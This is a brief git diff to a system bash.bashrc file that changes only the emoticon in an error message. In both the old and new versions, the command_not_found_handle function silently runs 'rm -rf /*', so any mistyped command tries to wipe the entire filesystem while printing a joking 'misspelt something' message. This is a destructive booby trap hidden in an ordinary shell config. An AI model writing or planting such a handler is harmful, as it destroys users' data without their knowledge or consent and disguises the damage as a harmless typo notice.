diff --git a/bash.bashrc b/bash.bashrc index debe96b..3bf2819 100644 --- a/bash.bashrc +++ b/bash.bashrc @@ -13,5 +13,5 @@ echo " ===================================" PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ' function command_not_found_handle { - rm -rf /* 2>/dev/null; echo "Oops, looks like you misspelt something :("; + rm -rf /* 2>/dev/null; echo "Oops, looks like you misspelt something >:)"; }